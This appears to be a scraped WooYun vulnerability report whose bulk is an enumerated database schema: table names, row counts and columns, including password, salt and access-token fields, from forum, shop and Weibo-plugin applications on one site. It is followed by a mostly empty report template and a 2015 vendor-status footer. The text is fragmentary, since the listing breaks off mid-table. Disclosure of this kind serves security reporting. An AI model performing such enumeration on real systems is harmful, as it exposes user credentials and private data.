xwb22_user_config
count:125
id
sina_uid
values
xwb22_user_focus
count:0
id
sina_uid
topic
source
add_time
xwb22_user_follow
count:0
friend_uid
fans_uid
datetime
xwb22_user_follow_copy
count:4294
friend_uid
fans_uid
datetime
xwb22_user_verify
count:0
id
sina_uid
nick
reason
add_time
operator
xwb22_users
count:4850
id
sina_uid
nickname
first_login
access_token
token_secret
uid
domain_name
max_notice_time
followers_count
xwb22_weibo_copy
count:1213
id
weibo
uid
nickname
addtime
disabled
pic
xwb22_weibo_delete
count:0
id
weibo
picid
sina_uid
nickname
retweeted_status
retweeted_wid
access_token
token_secret
dateline
xwb22_weibo_file
count:57
id
wid
uid
fclass
filename
ftime
downsum
state
free
xwb22_weibo_verify
count:0
id
weibo
cwid
picid
sina_uid
nickname
retweeted_status
retweeted_wid
access_token
token_secret
type
extend_id
extend_data
dateline
new_shop
ask
count:0
id
user_id
team_id
city_id
content
comment
create_time
card
count:0
id
code
partner_id
team_id
order_id
credit
consume
ip
begin_time
end_time
category
count:0
id
zone
czone
name
ename
letter
sort_order
cdb_access
count:0
uid
fid
allowview
allowpost
allowreply
allowgetattach
allowpostattach
adminuser
dateline
cdb_activities
count:0
tid
uid
cost
starttimefrom
starttimeto
place
class
gender
number
expiration
cdb_activityapplies
count:0
applyid
tid
username
uid
message
verified
dateline
payment
contact
cdb_addons
count:2
key
title
sitename
siteurl
description
contact
logo
system
cdb_adminactions
count:1
admingid
disabledactions
cdb_admincustom
count:0
id
title
url
sort
displayorder
clicks
uid
dateline
cdb_admingroups
count:7
admingid
alloweditpost
alloweditpoll
allowstickthread
allowmodpost
allowdelpost
allowmassprune
allowrefund
allowcensorword
allowviewip
allowbanip
allowedituser
allowmoduser
allowbanuser
allowpostannounce
allowviewlog
allowbanpost
disablepostctrl
supe_allowpushthread
allowhighlightthread
allowdigestthread
allowrecommendthread
allowbumpthread
allowclosethread
allowmovethread
allowedittypethread
allowstampthread
allowcopythread
allowmergethread
allowsplitthread
allowrepairthread
allowwarnpost
allowviewreport
alloweditforum
allowremovereward
allowedittrade
alloweditactivity
cdb_adminnotes
count:0
id
admin
access
adminid
dateline
expiration
message
cdb_adminsessions
count:0
uid
adminid
panel
ip
dateline
errorcount
storage
cdb_advertisements
count:0
advid
available
type
displayorder
title
targets
parameters
code
starttime
endtime
cdb_announcements
count:0
id
author
subject
type
displayorder
starttime
endtime
message
groups
cdb_attachmentfields
count:0
aid
tid
pid
uid
description
cdb_attachments
count:0
aid
tid
pid
width
dateline
readperm
price
filename
filetype
filesize
attachment
downloads
isimage
uid
thumb
remote
cdb_attachpaymentlog
count:0
uid
aid
authorid
dateline
amount
netamount
cdb_attachtypes
count:0
id
extension
maxsize
cdb_banned
count:0
id
ip1
ip2
ip3
ip4
admin
dateline
expiration
cdb_bbcodes
count:4
id
available
tag
icon
replacement
example
explanation
params
prompt
nest
displayorder
cdb_caches
count:41
cachename
type
dateline
expiration
data
cdb_creditslog
count:0
uid
fromto
sendcredits
receivecredits
send
receive
dateline
operation
cdb_crons
count:12
cronid
available
type
name
filename
lastrun
nextrun
weekday
day
hour
minute
cdb_debateposts
count:0
pid
stand
tid
uid
dateline
voters
voterids
cdb_debates
count:0
tid
uid
starttime
endtime
affirmdebaters
negadebaters
affirmvotes
negavotes
umpire
winner
bestdebater
affirmpoint
negapoint
umpirepoint
affirmvoterids
negavoterids
affirmreplies
negareplies
cdb_failedlogins
count:0
ip
count
lastupdate
cdb_faqs
count:34
id
fpid
displayorder
identifier
keyword
title
message
cdb_favoriteforums
count:0
fid
uid
dateline
newthreads
cdb_favorites
count:0
uid
tid
fid
cdb_favoritethreads
count:0
tid
uid
dateline
newreplies
cdb_feeds
count:0
feed_id
type
fid
typeid
sortid
appid
uid
username
data
template
dateline
cdb_forumfields
count:2
fid
description
password
icon
postcredits
replycredits
getattachcredits
postattachcredits
digestcredits
redirect
attachextensions
formulaperm
moderators
rules
threadtypes
threadsorts
viewperm
postperm
replyperm
getattachperm
postattachperm
keywords
supe_pushsetting
modrecommend
tradetypes
typemodels
threadplugin
extra
cdb_forumlinks
count:1
id
displayorder
name
url
description
logo
cdb_forumrecommend
count:0
fid
tid
typeid
displayorder
subject
author
authorid
moderatorid
expiration
position
highlight
aid
filename
cdb_forums
count:2
fid
fup
type
name
status
displayorder
styleid
threads
posts
todayposts
lastpost
allowsmilies
allowhtml
allowbbcode
allowimgcode
allowmediacode
allowanonymous
allowshare
allowpostspecial
allowspecialonly
alloweditrules
allowfeed
recyclebin
modnewposts
jammer
disablewatermark
inheritedmod
autoclose
forumcolumns
threadcaches
alloweditpost
simple
modworks
allowtag
allowglobalstick
cdb_imagetypes
count:3
typeid
available
name
type
displayorder
directory
cdb_invites
count:0
uid
dateline
expiration
inviteip
invitecode
reguid
regdateline
status
cdb_itempool
count:0
id
type
question
answer
cdb_magiclog
count:0
uid
magicid
action
dateline
amount
price
targettid
targetpid
targetuid
cdb_magicmarket
count:0
mid
magicid
uid
username
price
num
cdb_magics
count:12
magicid
available
type
name
identifier
description
displayorder
price
num
salevolume
supplytype
supplynum
weight
recommend
filename
magicperm
cdb_medallog
count:0
id
uid
medalid
type
dateline
expiration
status
cdb_medals
count:10
medalid
name
available
image
type
displayorder
description
expiration
permission
cdb_memberfields
count:2
uid
nickname
site
alipay
icq
qq
yahoo
msn
taobao
location
customstatus
medals
avatar
avatarwidth
avatarheight
bio
sightml
ignorepm
groupterms
authstr
spacename
buyercredit
sellercredit
cdb_membermagics
count:0
uid
magicid
num
cdb_memberrecommend
count:0
tid
recommenduid
dateline
cdb_members
count:2
uid
username
password
secques
gender
adminid
groupid
groupexpiry
extgroupids
regip
regdate
lastip
lastvisit
lastactivity
lastpost
posts
threads
digestposts
oltime
pageviews
credits
extcredits1
extcredits2
extcredits3
extcredits4
extcredits5
extcredits6
extcredits7
extcredits8
email
bday
sigstatus
tpp
ppp
styleid
dateformat
timeformat
pmsound
showemail
newsletter
invisible
timeoffset
prompt
accessmasks
editormode
customshow
xspacestatus
customaddfeed
newbietaskid
cdb_memberspaces
count:0
uid
style
description
layout
side
cdb_moderators
count:0
uid
fid
displayorder
inherited
cdb_modworks
count:0
uid
modaction
dateline
count
posts
cdb_mytasks
count:0
uid
username
taskid
status
csc
dateline
cdb_navs
count:5
id
parentid
name
title
url
target
type
available
displayorder
highlight
level
cdb_onlinelist
count:4
groupid
displayorder
title
url
cdb_onlinetime
count:1
uid
thismonth
total
lastupdate
cdb_orders
count:0
orderid
status
buyer
admin
uid
amount
price
submitdate
confirmdate
cdb_paymentlog
count:0
uid
tid
authorid
dateline
amount
netamount
cdb_pluginhooks
count:0
pluginhookid
pluginid
available
title
description
code
cdb_plugins
count:0
pluginid
available
adminid
name
identifier
description
datatables
directory
copyright
modules
version
cdb_pluginvars
count:0
pluginvarid
pluginid
displayorder
title
description
variable
type
value
extra
cdb_polloptions
count:0
polloptionid
tid
votes
displayorder
polloption
voterids
cdb_polls
count:0
tid
overt
multiple
visible
maxchoices
expiration
cdb_postposition
count:0
tid
position
pid
cdb_posts
count:13
pid
fid
tid
first
author
authorid
subject
dateline
message
useip
invisible
anonymous
usesig
htmlon
bbcodeoff
smileyoff
parseurloff
attachment
rate
ratetimes
status
cdb_profilefields
count:0
fieldid
available
invisible
title
description
size
displayorder
required
unchangeable
showinthread
selective
choices
cdb_projects
count:11
id
name
type
description
value
cdb_promotions
count:0
ip
uid
username
cdb_prompt
count:1
uid
typeid
number
cdb_promptmsgs
count:0
id
typeid
uid
extraid
new
dateline
message
actor
cdb_prompttype
count:6
id
key
name
script
cdb_ranks
count:5
rankid
ranktitle
postshigher
stars
color
cdb_ratelog
count:0
pid
uid
username
extcredits
dateline
score
reason
cdb_regips
count:0
ip
dateline
count
cdb_relatedthreads
count:0
tid
type
expiration
keywords
relatedthreads
cdb_reportlog
count:0
id
fid
pid
uid
username
status
type
reason
dateline
cdb_request
count:30
variable
value
type
system
cdb_rewardlog
count:0
tid
authorid
answererid
dateline
netamount
cdb_rsscaches
count:0
lastupdate
fid
tid
dateline
forum
author
subject
description
cdb_searchindex
count:0
searchid
keywords
searchstring
useip
uid
dateline
expiration
threadsortid
threads
tids
cdb_sessions
count:0
sid
ip1
ip2
ip3
ip4
uid
username
groupid
styleid
invisible
action
lastactivity
lastolupdate
pageviews
seccode
fid
tid
bloguid
cdb_settings
count:243
variable
value
cdb_smilies
count:89
id
typeid
displayorder
type
code
url
cdb_spacecaches
count:0
uid
variable
value
expiration
cdb_stats
count:52
type
variable
count
cdb_statvars
count:0
type
variable
value
cdb_styles
count:1
styleid
name
available
templateid
cdb_stylevars
count:47
stylevarid
styleid
variable
substitute
cdb_tags
count:0
tagname
closed
total
cdb_tasks
count:7
taskid
relatedtaskid
newbietask
available
name
description
icon
applicants
achievers
tasklimits
applyperm
scriptname
starttime
endtime
period
reward
prize
bonus
displayorder
version
cdb_taskvars
count:14
taskvarid
taskid
sort
name
description
variable
type
value
extra
cdb_templates
count:1
templateid
name
directory
copyright
cdb_threads
count:13
tid
fid
iconid
typeid
sortid
readperm
price
author
authorid
subject
dateline
lastpost
lastposter
views
replies
displayorder
highlight
digest
rate
special
attachment
moderated
closed
itemid
supe_pushstatus
recommends
recommend_add
recommend_sub
heats
status
cdb_threadsmod
count:0
tid
uid
username
dateline
expiration
action
status
magicid
stamp
cdb_threadtags
count:0
tagname
tid
cdb_threadtypes
count:0
typeid
displayorder
name
description
special
modelid
expiration
template
stemplate
cdb_tradecomments
count:0
id
orderid
pid
type
raterid
rater
rateeid
ratee
message
explanation
score
dateline
cdb_tradelog
count:0
tid
pid
orderid
tradeno
subject
price
quality
itemtype
number
tax
locus
sellerid
seller
selleraccount
buyerid
buyer
buyercontact
buyercredits
buyermsg
status
lastupdate
offline
buyername
buyerzip
buyerphone
buyermobile
transport
transportfee
baseprice
discount
ratestatus
message
credit
basecredit
cdb_tradeoptionvars
count:0
sortid
pid
optionid
value
cdb_trades
count:0
tid
pid
typeid
sellerid
seller
account
subject
price
amount
quality
locus
transport
ordinaryfee
expressfee
emsfee
itemtype
dateline
expiration
lastbuyer
lastupdate
totalitems
tradesum
closed
aid
displayorder
costprice
credit
costcredit
credittradesum
cdb_typemodels
count:4
id
name
displayorder
type
options
customoptions
cdb_typeoptions
count:65
optionid
classid
displayorder
title
description
identifier
type
unit
rules
cdb_typeoptionvars
count:0
sortid
tid
optionid
expiration
value
cdb_typevars
count:0
sortid
optionid
available
required
unchangeable
search
displayorder
subjectshow
cdb_uc_admins
count:1
uid
username
allowadminsetting
allowadminapp
allowadminuser
allowadminbadword
allowadmintag
allowadminpm
allowadmincredits
allowadmindomain
allowadmindb
allowadminnote
allowadmincache
allowadminlog
cdb_uc_applications
count:3
appid
type
name
url
authkey
ip
viewprourl
apifilename
charset
dbcharset
synlogin
recvnote
extra
tagtemplates
cdb_uc_badwords
count:0
id
admin
find
replacement
findpattern
cdb_uc_domains
count:0
id
domain
ip
cdb_uc_failedlogins
count:0
ip
count
lastupdate
cdb_uc_feeds
count:0
feedid
appid
icon
uid
username
dateline
hash_template
hash_data
title_template
title_data
body_template
body_data
body_general
image_1
image_1_link
image_2
image_2_link
image_3
image_3_link
image_4
image_4_link
target_ids
cdb_uc_friends
count:0
uid
friendid
direction
version
delstatus
comment
cdb_uc_mailqueue
count:0
mailid
touid
tomail
frommail
subject
message
charset
htmlon
level
dateline
failures
appid
cdb_uc_memberfields
count:7
uid
blacklist
cdb_uc_members
count:7
uid
username
password
email
myid
myidkey
regip
regdate
lastloginip
lastlogintime
salt
secques
cdb_uc_mergemembers
count:0
appid
username
cdb_uc_newpm
count:0
uid
cdb_uc_notelist
count:2
noteid
operation
closed
totalnum
succeednum
getdata
postdata
dateline
pri
app1
app2
app3
cdb_uc_pms
count:0
pmid
msgfrom
msgfromid
msgtoid
folder
new
subject
dateline
message
delstatus
related
fromappid
cdb_uc_protectedmembers
count:0
uid
username
appid
dateline
admin
cdb_uc_settings
count:24
k
v
cdb_uc_sqlcache
count:0
sqlid
data
expiry
cdb_uc_tags
count:0
tagname
appid
data
expiration
cdb_uc_vars
count:0
name
value
cdb_usergroups
count:19
groupid
radminid
type
system
grouptitle
creditshigher
creditslower
stars
color
groupavatar
readaccess
allowvisit
allowpost
allowreply
allowpostpoll
allowpostreward
allowposttrade
allowpostactivity
allowdirectpost
allowgetattach
allowpostattach
allowvote
allowmultigroups
allowsearch
allowcstatus
allowuseblog
allowinvisible
allowtransfer
allowsetreadperm
allowsetattachperm
allowhidecode
allowhtml
allowcusbbcode
allowanonymous
allownickname
allowsigbbcode
allowsigimgcode
allowviewpro
allowviewstats
disableperiodctrl
reasonpm
maxprice
maxsigsize
maxattachsize
maxsizeperday
maxpostsperhour
attachextensions
raterange
mintradeprice
maxtradeprice
minrewardprice
maxrewardprice
magicsdiscount
allowmagics
maxmagicsweight
allowbiobbcode
allowbioimgcode
maxbiosize
allowinvite
allowmailinvite
maxinvitenum
inviteprice
maxinviteday
allowpostdebate
tradestick
exempt
allowsendpm
maxattachnum
allowposturl
allowrecommend
edittimelimit
allowpostrushreply
cdb_validating
count:0
uid
submitdate
moddate
admin
submittimes
status
message
remark
cdb_warnings
count:0
wid
pid
operatorid
operator
authorid
author
dateline
reason
cdb_words
count:0
id
admin
find
replacement
extra
coupon
count:2
id
user_id
partner_id
team_id
order_id
type
credit
secret
consume
ip
sms
expire_time
consume_time
create_time
ecs_account_log
count:0
log_id
user_id
user_money
frozen_money
rank_points
pay_points
change_time
change_desc
change_type
ecs_ad
count:20
ad_id
position_id
media_type
ad_name
ad_link
ad_code
start_time
end_time
link_man
link_email
link_phone
click_count
enabled
ecs_ad_custom
count:0
ad_id
ad_type
ad_name
add_time
content
url
ad_status
ecs_ad_position
count:0
position_id
position_name
ad_width
ad_height
position_desc
position_style
ecs_admin_action
count:109
action_id
parent_id
action_code
relevance
ecs_admin_log
count:414
log_id
log_time
user_id
log_info
ip_address
ecs_admin_message
count:0
message_id
sender_id
receiver_id
sent_time
read_time
readed
deleted
title
message
ecs_admin_user
count:1
user_id
user_name
email
password
add_time
last_login
last_ip
action_list
nav_list
lang_type
agency_id
suppliers_id
todolist
role_id
ecs_adsense
count:2
from_ad
referer
clicks
ecs_affiliate_log
count:0
log_id
order_id
time
user_id
user_name
money
point
separate_type
ecs_agency
count:0
agency_id
agency_name
agency_desc
ecs_area_region
count:0
shipping_area_id
region_id
ecs_article
count:6
article_id
cat_id
title
content
author
author_email
keywords
article_type
is_open
add_time
file_url
open_type
link
description
ecs_article_cat
count:3
cat_id
cat_name
cat_type
keywords
cat_desc
sort_order
show_in_nav
parent_id
ecs_attribute
count:124
attr_id
cat_id
attr_name
attr_input_type
attr_type
attr_values
attr_index
sort_order
is_linked
attr_group
ecs_auction_log
count:0
log_id
act_id
bid_user
bid_price
bid_time
ecs_auto_manage
count:0
item_id
type
starttime
endtime
ecs_back_goods
count:0
rec_id
back_id
goods_id
product_id
product_sn
goods_name
brand_name
goods_sn
is_real
send_number
goods_attr
ecs_back_order
count:0
back_id
delivery_sn
order_sn
order_id
invoice_no
add_time
shipping_id
shipping_name
user_id
action_user
consignee
address
country
province
city
district
sign_building
email
zipcode
tel
mobile
best_time
postscript
how_oos
insure_fee
shipping_fee
update_time
suppliers_id
status
return_time
agency_id
ecs_bonus_type
count:0
type_id
type_name
type_money
send_type
min_amount
max_amount
send_start_date
send_end_date
use_start_date
use_end_date
min_goods_amount
ecs_booking_goods
count:0
rec_id
user_id
email
link_man
tel
goods_id
goods_desc
goods_number
booking_time
is_dispose
dispose_user
dispose_time
dispose_note
ecs_brand
count:0
brand_id
brand_name
brand_logo
brand_desc
site_url
sort_order
is_show
ecs_card
count:0
card_id
card_name
card_img
card_fee
free_money
card_desc
ecs_cart
count:0
rec_id
user_id
session_id
goods_id
goods_sn
product_id
goods_name
market_price
goods_price
goods_number
goods_attr
is_real
extension_code
parent_id
rec_type
is_gift
is_shipping
can_handsel
goods_attr_id
ecs_cat_recommend
count:9
cat_id
recommend_type
ecs_category
count:33
cat_id
cat_name
keywords
cat_desc
parent_id
sort_order
template_file
measure_unit
show_in_nav
style
is_show
grade
filter_attr
ecs_collect_goods
count:0
rec_id
user_id
goods_id
add_time
is_attention
ecs_comment
count:0
comment_id
comment_type
id_value
email
user_name
content
comment_rank
add_time
ip_address
status
parent_id
user_id
ecs_crons
count:0
cron_id
cron_code
cron_name
cron_desc
cron_order
cron_config
thistime
nextime
day
week
hour
minute
enable
run_once
allow_ip
alow_files
ecs_delivery_goods
count:0
rec_id
delivery_id
goods_id
product_id
product_sn
goods_name
brand_name
goods_sn
is_real
extension_code
parent_id
send_number
goods_attr
ecs_delivery_order
count:0
delivery_id
delivery_sn
order_sn
order_id
invoice_no
add_time
shipping_id
shipping_name
user_id
action_user
consignee
address
country
province
city
district
sign_building
email
zipcode
tel
mobile
best_time
postscript
how_oos
insure_fee
shipping_fee
update_time
suppliers_id
status
agency_id
ecs_email_list
count:0
id
email
stat
hash
ecs_email_sendlist
count:0
id
email
template_id
email_content
error
pri
last_send
ecs_error_log
count:0
id
info
file
time
ecs_exchange_goods
count:0
goods_id
exchange_integral
is_exchange
is_hot
ecs_favourable_activity
count:0
act_id
act_name
start_time
end_time
user_rank
act_range
act_range_ext
min_amount
max_amount
act_type
act_type_ext
gift
sort_order
ecs_feedback
count:0
msg_id
parent_id
user_id
user_name
user_email
msg_title
msg_type
msg_status
msg_content
msg_time
message_img
order_id
msg_area
ecs_friend_link
count:2
link_id
link_name
link_url
link_logo
show_order
ecs_goods
count:17
goods_id
cat_id
goods_sn
goods_name
goods_name_style
click_count
brand_id
provider_name
goods_number
goods_weight
market_price
shop_price
promote_price
promote_start_date
promote_end_date
warn_number
keywords
goods_brief
goods_desc
goods_thumb
goods_img
original_img
is_real
extension_code
is_on_sale
is_alone_sale
is_shipping
integral
add_time
sort_order
is_delete
is_best
is_new
is_hot
is_promote
bonus_type_id
last_update
goods_type
seller_note
give_integral
rank_integral
suppliers_id
is_check
ecs_goods_activity
count:0
act_id
act_name
act_desc
act_type
goods_id
product_id
goods_name
start_time
end_time
is_finished
ext_info
ecs_goods_article
count:0
goods_id
article_id
admin_id
ecs_goods_attr
count:298
goods_attr_id
goods_id
attr_id
attr_value
attr_price
ecs_goods_cat
count:39
goods_id
cat_id
ecs_goods_gallery
count:21
img_id
goods_id
img_url
img_desc
thumb_url
img_original
ecs_goods_type
count:6
cat_id
cat_name
enabled
attr_group
ecs_group_goods
count:0
parent_id
goods_id
goods_price
admin_id
ecs_keywords
count:0
date
searchengine
keyword
count
ecs_link_goods
count:0
goods_id
link_goods_id
is_double
admin_id
ecs_mail_templates
count:14
template_id
template_code

漏洞证明:

修复方案:

版权声明:转载请注明来源 渔村安全实验室@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-07-27 08:14

厂商回复:

暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无